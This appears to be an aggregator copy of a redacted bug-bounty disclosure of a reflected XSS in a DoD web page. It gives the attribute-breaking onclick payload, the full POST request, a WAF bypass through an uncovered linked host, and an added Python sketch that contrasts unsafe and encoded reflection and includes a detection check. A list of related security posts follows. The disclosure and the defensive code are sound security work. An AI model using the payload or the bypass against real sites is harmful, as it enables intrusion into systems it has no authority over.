➠ U.S. Dept Of Defense: [XSS] Reflected XSS via POST request


Description: XSS vulnerability found on one of █████████ subdomains. [DoD scope]

After analyzing https://██████████/ I found the ██████/████████-historic.cfm page that sends some parameters to the server. The fld_displaytype parameter is vulnerable to XSS. fld_displaytype=S changed to fld_displaytype=S"%20accesskey%3d"X"%20onclick%3d"alert('XSS Success!')

A WAF is deployed on the endpoint to prevent such attacks, but I found another domain linked to this host that the WAF did not cover, so I succeeded in firing the payload. By sending the POST request to https://█████████████████/ , the payload was successfully triggered.

```http
POST /██████/███████-historic.cfm HTTP/1.1
Host: █████████
Cookie: CFID=29878711; CFTOKEN=71972184
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
Origin: null
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

fld_graphfs=Y&fld_graphrs=N&fld_graphy1=N&fld_graphy2=N&fld_normal=Y&fld_max=Y&fld_min=Y&Submit=View-Graph&fld_from1=01%2F01%2F2023&fld_to1=12%2F31%2F2023&fld_displaytype=S"%20accesskey%3d"X"%20onclick%3d"alert('XSS......
```
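As an added illustration (not code from the report or from the affected site), the following Python models why the double quote in fld_displaytype matters: a hypothetical sink echoes the value into an HTML attribute unencoded, a hardened sink attribute-encodes it first, and a parser shows which attributes a browser would actually see in each case. The sample body is constructed after the request above; the sink templates and function names are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed POST body modelled on the report's request (not real target data):
# fld_displaytype carries a double quote that closes the attribute it is
# reflected into, then appends accesskey and an onclick handler.
SAMPLE_BODY = (
    "fld_graphfs=Y&fld_normal=Y&Submit=View-Graph&fld_from1=01%2F01%2F2023"
    '&fld_displaytype=S"%20accesskey%3d"X"%20onclick%3d"alert(1)"'
)

def extract_param(body: str, name: str) -> str:
    """Decode one form field from an application/x-www-form-urlencoded body."""
    return parse_qs(body).get(name, [""])[0]

def reflect_unsafe(value: str) -> str:
    """Hypothetical vulnerable sink: the parameter is echoed into an attribute as-is."""
    return f'<input type="hidden" name="fld_displaytype" value="{value}">'

def reflect_safe(value: str) -> str:
    """Hardened sink: attribute-encode the value so a quote cannot end the attribute."""
    return f'<input type="hidden" name="fld_displaytype" value="{html.escape(value, quote=True)}">'

class _AttrCollector(HTMLParser):
    """Collects the attributes a browser would see on the rendered tag."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)

def rendered_attributes(fragment: str) -> dict:
    parser = _AttrCollector()
    parser.feed(fragment)
    return parser.attrs

def has_event_handler(fragment: str) -> bool:
    """Detection check: did reflection produce any on* attribute on the tag?"""
    return any(name.lower().startswith("on") for name in rendered_attributes(fragment))

if __name__ == "__main__":
    value = extract_param(SAMPLE_BODY, "fld_displaytype")
    for label, sink in (("unsafe", reflect_unsafe), ("safe", reflect_safe)):
        fragment = sink(value)
        print(label, sorted(rendered_attributes(fragment)), "handler:", has_event_handler(fragment))
```

With the encoded sink the whole injected string stays inside the value attribute, which is the same check a WAF bypass via an uncovered host name cannot defeat, since the fix lives in the application rather than in front of it.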


➦ Vulnerabilities / Exploits ☆ vulners.com




➤ Related posts for 'U.S. Dept Of Defense: [XSS] Reflected XSS via POST request'

XSpear v1.3 - Powerfull XSS Scanning And Parameter Analysis Tool

779.19 points
XSpear is XSS Scanner on ruby gemsKey featuresPattern matching based XSS scanningDetect alert confirm prompt event on headless browser (with Selenium)Testing request/response for XSS protection bypass and reflected(or all) paramsReflected ParamsAll params(f

Student Management System | Django |

538.95 points
Student Management System is a system for Students where Students can check their details. In this system, a Admin Panel is included where admin can add students, add faculty and create notices. Create A Django Project django-admin startproject sms Cr

Everything about Cross-Site Scripting (XSS)

528.13 points
During surfing the web sometimes we welcomed with a pop-up, after entering a web page. Even on our website now have a pop-up for the very first time. Suppose our system can be attacked by these pop-ups, may be malicious payloads comes in to our system or

CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints

317.29 points
REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and headerIntelligent: tests are generated based on data types and constraint

NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations

303.82 points
A plea for network defenders and software manufacturers to fix common problems. EXECUTIVE SUMMARY The National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint cybersecurity advisory (CSA) to h

XSpear - Powerfull XSS Scanning And Parameter Analysis Tool

286.96 points
XSpear is XSS Scanner on ruby gems.Key features Pattern matching based XSS scanning Detect alert confirm prompt event on headless browser (with Selenium) Testing request/response for XSS protection bypass and reflected params Reflected Params Filtered test

Request Tracing in Node.js

259.23 points
There’s a saying that software developers like us spend 90% of our time on debugging, and only 10% of our time actually writing code. This is a bit of an exaggeration! It is true that debugging is a significant part of our work, though, especially in

RedWarden - Flexible CobaltStrike Malleable Redirector

247.69 points
RedWarden - Flexible CobaltStrike Malleable Redirector(previously known as proxy2's malleable_redirector plugin) Let's raise the bar in C2 redirectors IR resiliency, shall we? Red Teaming business has seen several different great ideas on how to combat incident responders and misdirect them while offering resistant C2 redirectors network at the same time. Thi

Server Side Rendering a Blog with Web Components

216.27 points
This blog post supports a Youtube Livestream scheduled for Wednesday 4/19 at 12pm EST / 9am PST. You can watch the livestream here on Youtube. Introduction It has never been easier to server side render a website. Years ago it took server sid

Git All The Payloads! A Collection Of Web Attack Payloads

211.4 points
Git All the Payloads! A collection of web attack payloads. Pull requests are welcome!Usagerun ./get.sh to download external payloads and unzip any payload files that are compressed.Payload Creditsfuzzdb - https://github.com/fuzzdb-project/fuzzdbSec

Axios GET and POST examples

207.6 points
This article was originally published on the DeadSimpleChat Blog: Axios GET and POST examples In this article, we are going to learn about how to send get and post requests with Axios. Axios is a promise-based HTTP client for the browser and node.j

Team Security discussion about U.S. Dept Of Defense: [XSS] Reflected XSS via POST request